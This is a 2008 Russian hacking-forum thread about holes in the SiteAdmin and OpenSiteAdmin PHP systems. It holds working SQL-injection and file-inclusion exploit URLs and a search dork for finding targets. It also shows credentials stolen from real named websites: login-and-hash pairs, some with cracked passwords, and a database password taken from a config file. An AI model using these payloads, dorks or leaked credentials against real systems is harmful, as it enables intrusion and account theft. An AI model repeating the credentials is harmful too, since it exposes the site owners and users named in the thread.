ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Сценарии/CMF/СMS
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

SiteAdmin
  #1  
Старый 03.07.2008, 23:51
Аватар для halkfild
halkfild
Leaders of Antichat - Level 4
Регистрация: 11.11.2005
Сообщений: 391
Провел на форуме:
7084941

Репутация: 2277
По умолчанию SiteAdmin

SiteAdmin

site: http://as-admin.com
version: последняя с оффсайта, а если верить тому, что написано в скриптах, то v.1.4
dork: inurl:line2.php для версии без модреврайта и нечто похожее для версии с модреврайтом


уязвимость в файле cnews.lib.php

PHP код:
function printInfo($tpl$index=''$other_limit=0) {
        if(!
$this->active) return;
        
$id=getParm('art');
        if(!
$index$index=$this->url_self;
        if(!
$id) return;
        
$sql="select * from {$this->info_table} info where info.news_id=$id";
        
$res=mysql_query($sql) or print(mysql_error());
        if (@
mysql_num_rows($res)) {
................................................................. 
где функция getParm в файле common.lib.php

PHP код:
function getParm($var_name$def_val=''$type=''$max=8064)
 {  if(!isset(
$GLOBALS['uri_set'])||!$GLOBALS['uri_set'])
    return 
sGetParm($var_name$def_val$type$max);
     switch (
strtoupper($type)) {
         
//GET
         
case 'G'$var=isset($_GET["$var_name"])?$_GET["$var_name"]:(isset($HTTP_GET_VARS["$var_name"])?$HTTP_GET_VARS["$var_name"]:$def_val); $max=min($max,255); break;
         
//POST
         
case 'P'$var=isset($_POST["$var_name"])?$_POST["$var_name"]:(isset($HTTP_POST_VARS["$var_name"])?$HTTP_POST_VARS["$var_name"]:$def_val); break;
         
//COOKIE
         
case 'C'$var=isset($_COOKIE["$var_name"])?$_COOKIE["$var_name"]:(isset($HTTP_COOKIE_VARS["$var_name"])?$HTTP_COOKIE_VARS["$var_name"]:$def_val); break;
         
//FILES
         
case 'F'$var=isset($_FILES["$var_name"])?$_FILES["$var_name"]:(isset($HTTP_POST_FILES["$var_name"])?$HTTP_POST_FILES["$var_name"]:$def_val); break;
         
//SESSION
         
case 'S'$var=isset($_SESSION["$var_name"])?$_SESSION["$var_name"]:(isset($HTTP_SESSION_VARS["$var_name"])?$HTTP_SESSION_VARS["$var_name"]:$def_val); break;
        
//ENV
         
case 'E'$var=isset($_ENV["$var_name"])?$_ENV["$var_name"]:(isset($HTTP_ENV_VARS["$var_name"])?$HTTP_ENV_VARS["$var_name"]:$def_val); break;
         
//ALL (EXCEPT SESSION & ENV)
         
default: $var=isset($_REQUEST["$var_name"])?$_REQUEST["$var_name"]:$def_val;
     }
    if(!
is_array($var) && strlen($var)>$max) { $var=substr($var,0,$max); }
    return 
$var;
 } 
вообщем, никакой фильтрации..

далее

Цитата:
http://site.cc/line2.php?lng=ru&art=16+limit+0+union+select+1,2,c oncat_ws(0x3a3a,user_login,user_passw),4,5,6,7+fro m+auth_users+limit+3,10/*&cat=2
есть файл настроек тут
Цитата:
\cfg\config.inc.php

з.ы.

по оффсайту

Цитата:
http://www.as-admin.com/line2.php?lng=ru&art=16+limit+0+union+select+1,2,c oncat_ws(0x3a3a,user_login,user_passw),4,5,6,7+fro m+auth_users+limit+3,10/*&cat=2
tar22@mail.ru::e7cb5347305e316067fd0f23b763b409
era@era.dp.ua::352490db5c690967a62f6c684211b1b5
mail@zeus-it.ru::dad32a5aa256160e695870a6f58646ab
lazarm@yandex.ru::2bb56da7e88e7597716e05168b5f53e7
studio@as-admin.com::40f464cb41198e44392061b18977b0f4
r31@r31.ru::260b4afd213f0f5742af6a5eb067ffe1
c3400-club@yandex.ru::26c723d68b0d815982d39a2e76d3ab72

конфиг

PHP код:
/*        Configuration file for "Test"
*        Created by STM-studio stm.dp.ua@gmail.com
*        v.1.4
*/
$cfg['mysql_server']    ='localhost';
$cfg['mysql_database']    ='as-admin';
$cfg['mysql_user']        ='tarasua';
$cfg['mysql_spassword']    ='1508SuperKap';

$cfg['prefix']    ='sa';       //Префікс таблиць бази даних
$cfg['lang']    ='ru,ua,en'//Наявні мови сайту 
 
Ответить с цитированием

  #2  
Старый 04.07.2008, 11:28
Аватар для FraiDex
FraiDex
Участник форума
Регистрация: 16.06.2006
Сообщений: 179
Провел на форуме:
515368

Репутация: 135
Отправить сообщение для FraiDex с помощью ICQ
По умолчанию

OpenSiteAdmin <= 0.9.1.1 Multiple File Inclusion Vulnerabilities
Vulnerable Code:
PHP код:
-OpenSiteAdmin/indexFooter.php
require_once($path."footer.php");

-
OpenSiteAdmin/scripts/classes/DatabaseManager.php
require_once($path."OpenSiteAdmin/include.php");
require_once(
$path."OpenSiteAdmin/scripts/classes/ErrorLogManager.php");

-
OpenSiteAdmin/scripts/classes/FieldManager.php
require_once($path."OpenSiteAdmin/scripts/classes/Fields/Checkbox.php");
require_once(
$path."OpenSiteAdmin/scripts/classes/Fields/ForeignKey.php");
.....
..

-
OpenSiteAdmin/scripts/classes/Filter.php
require_once($path."OpenSiteAdmin/scripts/classes/Filters/SingleFilter.php");

-
OpenSiteAdmin/scripts/classes/Form.php
require_once($path."/OpenSiteAdmin/scripts/classes/Forms/Form_List.php");
require_once(
$path."/OpenSiteAdmin/scripts/classes/Forms/Form_Single.php");

-
OpenSiteAdmin/scripts/classes/FormManager.php
require_once($path."OpenSiteAdmin/scripts/classes/Form.php");

-
OpenSiteAdmin/scripts/classes/LoginManager.php
require_once($path."OpenSiteAdmin/scripts/classes/SecurityManager.php");

-
OpenSiteAdmin/scripts/classes/Filters/SingleFilter.php
require_once($path."OpenSiteAdmin/scripts/classes/RowManager.php"); 
Exploit:
Код:
http://www.vulnerable.com/OpenSiteAdmin/indexFooter.php?path=<File Inclusion>%00
http://www.vulnerable.com/OpenSiteAdmin/scripts/classes/DatabaseManager.php?path=<File Inclusion>%00
http://www.vulnerable.com/OpenSiteAdmin/scripts/classes/FieldManager.php?path=<File Inclusion>%00
http://www.vulnerable.com/OpenSiteAdmin/scripts/classes/Filter.php?path=<File Inclusion>%00
http://www.vulnerable.com/OpenSiteAdmin/scripts/classes/Form.php?path=<File Inclusion>%00
http://www.vulnerable.com/OpenSiteAdmin/scripts/classes/FormManager.php?path=<File Inclusion>%00
http://www.vulnerable.com/OpenSiteAdmin/scripts/classes/LoginManager.php?path=<File Inclusion>%00
http://www.vulnerable.com/OpenSiteAdmin/scripts/classes/Filters/SingleFilter.php?path=<File Inclusion>%00
(c)milw0rm.com

Последний раз редактировалось FraiDex; 04.07.2008 в 11:32..
 
Ответить с цитированием

  #3  
Старый 27.07.2008, 23:56
Аватар для Twiddle
Twiddle
Познающий
Регистрация: 06.09.2006
Сообщений: 94
Провел на форуме:
397064

Репутация: 15
Thumbs up

Седня просканил сканером и он нашел !57 инъекций.
Юзаем:
PHP код:
xxx.com/line2.php?lng=ru&art=16+limit+0+union+select+1,2,concat_ws(0x3a3a,user_login,user_passw),4,5,6,7+fr

om
+auth_users+limit+3,10/*&cat=2 
Отчет AWVS4
PHP код:
http://rapidshare.com/files/132908385/__1057___1080___1089___1090___1077___1084___1072____1091___1087___1088___1072___1074___1083___1077__.html 
И бонус:

Код:
http://www.e-light.com.ua/line2.php andrei::62a7ba583911f266cd400d8864b86999
http://www.cifrotech.com.ua/line2.php mcm::bc37283c8e236d39f9a74881498eb1d5
http://www.vp.com.ua/line2.php studio@as-admin.com::40f464cb41198e44392061b18977b0f4
http://vesnasouvenir.com.ua/line2.php studio@as-admin.com 40f464cb41198e44392061b18977b0f4
http://piton.com.ua/line2.php studio@as-admin.com::40f464cb41198e44392061b18977b0f4
ops-print.com.ua/line2.php studio@as-admin.com::40f464cb41198e44392061b18977b0f4
http://pigment.com.ua/line2.php tar22@mail.ru::e7cb5347305e316067fd0f23b763b409 2hgjrpfa
http://trol.com.ua/line2.php studio@as-admin.com::40f464cb41198e44392061b18977b0f4
http://expoland.com.ua/line2.php  studio@as-admin.com::40f464cb41198e44392061b18977b0f4
http://www.eva.dp.ua/line2.php tar22@mail.ru::e7cb5347305e316067fd0f23b763b409 2hgjrpfa
www.as-admin.com/ tar22@mail.ru::e7cb5347305e316067fd0f23b763b409 2hgjrpfa
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ